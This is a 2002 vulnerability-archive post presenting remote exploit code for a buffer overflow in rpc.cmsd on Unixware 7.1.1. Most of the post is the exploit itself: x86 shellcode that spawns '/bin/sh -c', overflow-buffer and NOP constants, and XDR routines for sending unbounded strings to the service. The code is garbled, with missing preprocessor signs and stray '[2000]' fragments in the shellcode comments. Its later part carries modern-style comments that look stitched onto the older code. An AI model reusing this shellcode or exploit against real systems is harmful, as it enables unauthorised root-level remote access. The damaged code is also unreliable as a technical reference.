Unixware 7.1.1 rpc.cmsd remote exploit code.

2002-01-11T00:00:00
ID SECURITYVULNS:DOC:2355
Type securityvulns
Reporter Securityvulns
Modified 2002-01-11T00:00:00

Description

Hi, I'm jGgM.

Here is Unixware 7.1.1 rpc.cmsd remote exploit code.

This is an old bug. (Currently patched... maybe.)

This works only on unpatched Unixware 7.1.1.


Korean security info, by jGgM.

http://www.forsecure.com/

http://www.netemperor.com/


/*

 * Unixware 7.x rpc.cmsd exploit by jGgM
 *
 * http://www.netemperor.com/en/
 *
 * EMail: jggm@mail.com

*/

include <stdlib.h>

include <stdio.h>

include <string.h>

include <unistd.h>

include <rpc/rpc.h>

define CMSD_PROG 100068

define CMSD_VERS 4

define CMSD_PROC 21

define BUFFER_SIZE 1036

define SHELL_START 1024

define RET_LENGTH 12

define ADJUST 100

define NOP 0x90

define LEN 68

char shell[] =

/ 0 / "\xeb\x3d" /* jmp springboard

[2000]*/

/ syscall: [2000]/

/ 2 / "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0

[2000]*/

/ 9 / "\xc3" / ret [2000]/

/ start: [2000]/

/ 10 / "\x5e" /* popl %esi

[2000]*/

/ 11 / "\x31\xc0" /* xor %eax,%eax

[2000]*/

/ 13 / "\x89\x46\xbf" /* movl %eax,-

0x41(%esi) */

/ 16 / "\x88\x46\xc4" /* movb %al,-0x3c

(%esi) */

/ 19 / "\x89\x46\x0c" /* movl %eax,0xc

(%esi) */

/ 22 / "\x88\x46\x17" /* movb %al,0x17

(%esi) */

/ 25 / "\x88\x46\x1a" /* movb %al,0x1a

(%esi) */

/ 28 / "\x88\x46\xff" /* movb %al,0x??

(%esi) */

/ execve: [2000]/

/ 31 / "\x31\xc0" /* xor %eax,%eax

[2000]*/

/ 33 / "\x50" /* pushl %eax

[2000]*/

/ 34 / "\x56" /* pushl %esi

[2000]*/

/ 35 / "\x8d\x5e\x10" /* leal 0x10(%

esi),%ebx */

/ 38 / "\x89\x1e" /* movl %ebx,(%

esi)[2000]*/

/ 40 / "\x53" /* pushl %ebx

[2000]*/

/ 41 / "\x8d\x5e\x18" /* leal 0x18(%

esi),%ebx */

/ 44 / "\x89\x5e\x04" /* movl %ebx,0x4

(%esi) */

/ 47 / "\x8d\x5e\x1b" /* leal 0x1b(%

esi),%ebx */

/ 50 / "\x89\x5e\x08" /* movl %ebx,0x8

(%esi) */

/ 53 / "\xb0\x3b" /* movb $0x3b,%al

[2000]*/

/ 55 / "\xe8\xc6\xff\xff\xff" /* call syscall

[2000]*/

/ 60 / "\x83\xc4\x0c" /* addl $0xc,%

esp [2000]*/

/ springboard: [2000]/

/ 63 / "\xe8\xc6\xff\xff\xff" /* call start

[2000]*/

/ data: [2000]/

/ 68 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 72 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 76 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 80 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 84 / "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /*

DATA [2000]*/

/ 92 / "\x2d\x63\xff"; /* DATA

[2000]*/

/*
 * Request body sent to rpc.cmsd: two NUL-terminated strings, serialized
 * by xdr_cm_send() via xdr_wrapstring(). Nothing in this structure or
 * its XDR routine bounds the length of either string, so a decoder that
 * copies them into fixed-size storage must enforce its own limit first.
 */
struct cm_send {
    char *s1;   /* first string argument, encoded first */
    char *s2;   /* second string argument, encoded second */
};

/*
 * Reply body returned by the call: a single int, decoded by
 * xdr_cm_reply(). Its meaning is not established anywhere in this
 * file — presumably a status code; verify against the server side.
 */
struct cm_reply {
    int i;
};

/*
 * XDR routine for struct cm_send: runs s1 and then s2 through
 * xdr_wrapstring() in the direction selected by xdrs.
 *
 * Returns TRUE when both strings were processed, FALSE as soon as
 * either one fails (s2 is not touched if s1 fails).
 */
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
    /* Order matters for wire compatibility: s1 precedes s2. */
    char **fields[] = { &objp->s1, &objp->s2 };

    for (size_t idx = 0; idx < sizeof fields / sizeof fields[0]; idx++) {
        if (!xdr_wrapstring(xdrs, fields[idx])) {
            return FALSE;
        }
    }
    return TRUE;
}

/*
 * XDR routine for struct cm_reply: processes the single int member.
 *
 * Returns TRUE when xdr_int() succeeds, FALSE otherwise.
 */
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
    /* The reply carries one int; its (de)serialization status is the result. */
    return xdr_int(xdrs, &objp->i) ? TRUE : FALSE;
}